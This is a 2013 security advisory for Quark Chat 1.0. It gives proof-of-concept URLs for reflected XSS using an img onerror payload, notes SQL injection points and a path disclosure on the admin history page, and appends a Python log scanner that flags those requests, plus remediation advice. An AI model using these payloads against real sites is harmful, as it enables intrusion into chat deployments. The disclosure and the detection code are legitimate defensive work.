Quark Chat 1.0 XSS / SQL Injection / Path Disclosure

2013.08.16
Credit: Dylan Irzi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89, CWE-79

###########################################################################################
# Exploit Title: Quark Chat 1.0 - XSS / SQL Injection / Path Disclosure
# Date: August 15, 2013
# Exploit Author: Dylan Irzi
# Credit goes to: websecuritydev.com
# Vendor Homepage: http://www.quack-chat.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.0
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev.
###########################################################################################

Cross Site Scripting:

Affected files:
qchat.php
qc_admin/index.php?p=history

PoC: localhost/qchat.php
Vector: ""><img src=x onerror=prompt(/XSS/);>>
Input: <input id="name" type="text" style="width:200px;" name="name">
Is Reflected: localhost/qc_admin/index.php?p=history

PoC #2:
localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)

Example:
localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E

-------------------------------------------------------------------
SQL Injection

localhost/qc_admin/index.php?p=history&id=(SQL Injection)
localhost/qc_admin/index.php?p=history&page=(SQL Injection)

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e (Replace with a valid session cookie)

-------------------------------------------------------------------
Path Disclosure

localhost/qc_admin/index.php?p=history&id='

in /var/www/chat/qc_admin/index.php on line 249

-------------------------------------------------------------------
Example:
http://www.quack-chat.com/demo.php

--------------------------------------------------------------------
*By Dylan Irzi @Dylan_Irzi11 Security Pentest.*
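All three issues above are reached through the id and page parameters of qc_admin/index.php?p=history carrying something other than an integer. The following log check flags such requests; it is an added example, not part of the original advisory or of Quark Chat, and it assumes a combined-format web server access log and that both parameters are meant to be plain integers. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory reports as injectable on the admin history page.
NUMERIC_PARAMS = ("id", "page")
TARGET_PATH = "/qc_admin/index.php"
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return {param: value} for id/page values that are not plain integers."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(TARGET_PATH):
        return {}
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("p") != ["history"]:
        return {}
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            # parse_qs percent-decodes, so URL-encoded input is checked too.
            if not re.fullmatch(r"\d{1,10}", value):
                bad[name] = value
    return bad

def scan(log_lines):
    """Return (line_number, findings) for every flagged log line."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = suspicious_params(match.group(1))
            if findings:
                hits.append((number, findings))
    return hits

# Constructed sample log lines; the two flagged requests reuse the advisory's own PoC URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Aug/2013:10:00:01 +0000] "GET /qc_admin/index.php?p=history&page=2 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [16/Aug/2013:10:00:07 +0000] "GET /qc_admin/index.php?p=history&id=%27 HTTP/1.1" 200 311',
    '192.0.2.11 - - [16/Aug/2013:10:00:09 +0000] "GET /qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E HTTP/1.1" 200 5240',
    '192.0.2.12 - - [16/Aug/2013:10:01:00 +0000] "GET /qchat.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same integer-only rule, enforced server-side before the value reaches the query or the page output, removes the injection point; turning off on-page PHP error display addresses the path disclosure.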

References:

https://twitter.com/Dylan_irzi11

